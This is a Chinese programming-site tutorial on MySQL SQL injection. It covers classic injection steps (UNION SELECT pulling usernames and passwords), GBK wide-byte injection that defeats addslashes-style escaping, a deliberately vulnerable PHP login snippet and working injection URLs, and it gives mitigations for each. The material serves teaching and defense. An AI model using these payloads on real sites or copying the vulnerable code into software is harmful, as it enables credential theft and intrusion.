程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 數據庫知識 >> SqlServer數據庫 >> 關於SqlServer >> MySQL中SQL的單字節注入與寬字節注入

MySQL中SQL的單字節注入與寬字節注入

編輯:關於SqlServer
主機網全新上線,買空間、服務器就上主機網,安全有保障!

一、單字節SQL注入

MySQL的SQL注入已經由來已久,以下是普遍采用的注入步驟:

1、在GET參數上加一個/*或者#(MySQL專有的注釋),判斷數據庫是否是MySQL,比如:
http://www.xxx.com.cn/article.PHP?id=1607 and 1=1/*

2、猜解某表的字段數,從order by 1一直更改到頁面出錯為止,就可以得到該表的字段數

注入URL:http://www.xxx.com.cn/article.PHP?id=1607 or 1=1 order by 10#

對應的SQL: select * from articles where id=1607 or 1=1 order by 10#….


3、使用該表和用戶表進行關聯查詢,在文章列表裡就可以看到用戶名和密碼了。當也要猜解用戶表的表名和用戶名、密碼的字段名,比如上一步得到的字段數是5:

注入的URL:http://www.xxx.com.cn/article.PHP?id=1607 or 1=1 union select  username,passWord,1,2,3 from user

對應的SQL: select * from articles where id=1607 or 1=1  union select  username,passWord,1,2,3 from user


這樣就可以在界面上看到用戶名和密碼了。

解決方法:

過濾數據:這並不是羅唆。在合適的地方使用良好的數據過濾,可以減小多數安全隱患,甚至可以消除其中的一部分。

將數據用括號包含:如果你的數據庫允許(MySQL 允許),在 SQL 語句中,不論什麼類型的數據都用單引號包含起來。

轉義數據:一些合法的數據可能在無意中破壞 SQL 語句本身的格式。使用 MySQL_escape_string() 或者所使用數據庫提供的轉移函數。如果沒有提供這樣的函數,addslashes() 也是不錯的最後選擇。

二、寬字節注入

寬字節注入也是在最近的項目中發現的問題,大家都知道%df’ 被PHP轉義(開啟GPC、用addslashes函數,或者icov等),單引號被加上反斜槓\,變成了 %df\’,其中\的十六進制是 %5C ,那麼現在 %df\’ = %df%5c%27,如果程序的默認字符集是GBK等寬字節字符集,則MySQL用GBK的編碼時,會認為 %df%5c 是一個寬字符,也就是縗’,也就是說:%df\’ = %df%5c%27=縗’,有了單引號就好注入了。比如:

以下為引用的內容:

$conn = MySQL_connect(”localhost”,”root”,”2sdfxedd”);
MySQL_query(”SET NAMES ‘GBK’”);
MySQL_select_db(”test”,$conn);
$user = MySQL_escape_string($_GET['user']);
$pass = MySQL_escape_string($_GET['pass']);
$sql = “select * from cms_user where username = ‘$user’ and passWord=’$pass’”;
$result = MySQL_query($sql,$conn);
while ($row = mysql_fetch_array($result, MySQL_ASSOC)) {
$rows[] = $row;
}
?>


則通過以下注入即可:

http://www.xxx.com/login.PHP?user=%df’%20or%201=1%20limit%201,1%23&pass=

對應的SQL是:

select * from cms_user where username = ‘運’ or 1=1 limit 1,1#’ and passWord=”

解決方法:就是在初始化連接和字符集之後,使用SET character_set_clIEnt=binary來設定客戶端的字符集是二進制的。如:

以下為引用的內容:

MySQL_query(”SET character_set_clIEnt=binary”);
  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved